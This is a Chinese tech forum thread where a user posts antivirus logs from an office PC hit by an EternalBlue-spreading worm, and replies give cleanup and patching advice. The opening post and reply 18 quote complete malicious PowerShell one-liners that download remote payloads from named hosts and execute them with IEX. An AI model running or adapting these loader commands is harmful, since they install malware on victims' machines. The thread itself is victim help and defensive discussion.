操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
命令行:powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='1cd2db7421c0b88eb89eb6182bd6785e';$ifp=$env:tmp+'\if.bin';$down_url='http://207.154.225.82';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$.ToString('X2')};return $s}if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Obj
ect Net.WebClient)."downloaddata"($down_url+'/if.bin?SZXHRZZLIT036&9CBD7D74-E8C3-6E51-230D-12457CECDB29&DC:4A:3E:76:02:A0');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I
EX(-join[char[]]$con)"
攻击方式:Exploit/EternalBlue
远程地址:10.83.3.33:445
防御结果:已阻止
1
BrettD 2020-02-28 14:27:36 +08:00 via iPhone
勒索软件的感觉
|
2
shadowyue OP http://207.154.225.82
这个地址我还能访问,是个 nginx |
3
crab 2020-02-28 14:29:59 +08:00
局域网没打那补丁?
|
4
phpinfos 2020-02-28 14:30:53 +08:00
永恒之蓝 445 端口关掉 打补丁
|
7
phpinfos 2020-02-28 14:35:11 +08:00
|
8
Osk 2020-02-28 14:36:48 +08:00
看这样子怎么像 smb v1 的漏洞补丁没打?
|
9
Osk 2020-02-28 14:38:24 +08:00
不需要共享打印机和文件夹的话可以先在防火墙里面把本机的 445 等 smb service 端口关闭了,毕竟看样子你是在毒窝里面了🤣
|
10
shadowyue OP 淦哦,公司 win10 没法更新补丁
|
12
shadowyue OP it 说自己杀毒就行,一直都有这个病毒🤣
|
13
Osk 2020-02-28 14:59:04 +08:00
@shadowyue 永恒之蓝在没打补丁或做防护措施的局域网中传播很快的。
win7, win8, win 10 <1703 (好像是这个版本)都会中招。很好奇 win 10 没法更新补丁是什么情况? win10 打补丁比 win7 方便多了,只需要去下载最近的月度累计更新手动安装也很方便。 作为用户,不想打补丁就先把本机的 445、135、137、138、139 端口关闭了,除非你需要共享打印机或者文件给别人。毕竟万一火绒没拦住就惨了 |
14
Osk 2020-02-28 15:00:50 +08:00
另外,看你们内网的 ip 都是 10 的,看起来是大公司了,it 都这么水吗 /doge/
|
15
shadowyue OP @Osk 公司好像没几个人用 win10,我更新一直都是提示失败了,不知道为啥。
我被攻击了 powershell 这个程序就疯狂跑吃 cpu,好奇别人没这个问题吗,电脑卡爆了应该有别人反馈才对。 公司是蛮大的,工作累了直接睡,没问题 🤣 |
16
Osk 2020-02-28 15:15:44 +08:00
公司上外网需要使用代理吗?
吃 cpu 而不搞你的文件的话,看起来像挖矿的程序,危害也。。。不大吧 /滑稽 / |
17
shadowyue OP @Osk 不用,但是禁止了一些娱乐网站,我自己挂代理可以浏览,哈哈
按你说的吧 445 端口关闭了,貌似已经没问题了,谢谢你 |
18
shadowyue OP @Osk 大佬救救我,这又是啥
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE 命令行:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c "$Lemon_Duck='1EdJ95\kmSXYuMOLF1';$x='t.awc'+'na.com';;$y='http://'+$x+'/x.js';$z=$y+'p?ipc_20200228';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}" 风险分类:木马盗号 访问网址:t.awcna.com/x.js 操作结果:已阻止 |
19
Shazoo 2020-02-28 15:55:40 +08:00
下载 http://t.awcna.com/x.js ,如果程序的 md5=a49add2a8eeb7e89b9d743c0af0e1443,执行之。
https://x.threatbook.cn/nodev4/domain/awcna.com 看看细节呗。 |
20
Osk 2020-02-28 15:56:58 +08:00
@shadowyue 看来一开始火绒并没有拦住病毒。。。先把 powershell 进程结束了看是否再生,建议断网杀毒。必要的话重装了。
|
23
ThirdFlame 2020-02-28 16:07:45 +08:00 1
你的电脑已经被控制了。 通过 powershell 执行恶意代码 ing
|
24
shadowyue OP @ThirdFlame 怎么处理啊,大佬
|
25
WordTian 2020-02-28 16:26:55 +08:00 via Android
备份好重要文件,重装系统吧,联网前关掉 445 端口
|
26
juded 2020-02-28 16:32:20 +08:00
火绒行为管理不错,但查杀能力太差了。
|
27
vocaloid 2020-02-28 16:37:37 +08:00
把 powershell 进程先杀掉啊。。要不还会干更多的事情
|
28
ihacku 2020-02-28 16:46:08 +08:00 via iPhone
这个动作本身已经被拦截了
你没有打补丁,可以在火绒里面打下补丁重启生效 可以通知 IT 发下 10.83.3.33 这台机器中毒了 杀毒打补丁 内网应该不止这一台被感染的 |
29
Osk 2020-02-28 16:51:26 +08:00
@shadowyue 那我还是建议重装了, 如果非要清理, 最好进入离线系统, 使用其它杀毒软件对 C 盘全盘扫描, 离线的原因是避免恶意程序对自身做隐藏或者干扰.
查杀完成后, 还需要在离线系统(干净的 PE 中)使用 autoruns 等工具对所有的 驱动, 服务, 自启动等项目手工排查, 一些恶意程序隐藏的很好, 我觉得这一步是必须的. 最后问题来了: 都这么麻烦了, 还不如重装. 重装后: 先不要联网, 防火墙关闭 smb v1(445), rdp(3389) 等端口, 不然处在毒窝中分分钟死灰复燃. 不过, 使用最新的 Windows 10 1909 镜像也不要太紧张, 大部分局域网传播的严重漏洞已经封好了. |
30
wanguorui123 2020-02-28 17:07:42 +08:00
永恒之蓝的变种蠕虫病毒有点多
|
31
Ailoli 2020-02-28 18:34:22 +08:00
之前公司同事电脑出现过,后面断网全盘查杀就解决了
|
32
jousca 2020-02-28 18:37:07 +08:00
内网里攻击你那台电脑中了蠕虫,永恒之蓝漏洞。
|
33
manami 2020-02-28 18:40:27 +08:00 via Android
你需要卡巴斯基!
|
34
Buges 2020-02-28 18:45:28 +08:00 via Android
|
35
emptyiscolor 2020-02-29 11:15:11 +08:00
@shadowyue 利用驱动人生后门进行传播的木马,建议直接重装系统然后安装主流杀软吧
|
36
zdswater 2020-05-20 22:05:44 +08:00
中奖了,火绒扫了一遍杀了还有。不知道咋处理了
|
37
zdswater 2020-05-20 22:06:07 +08:00
|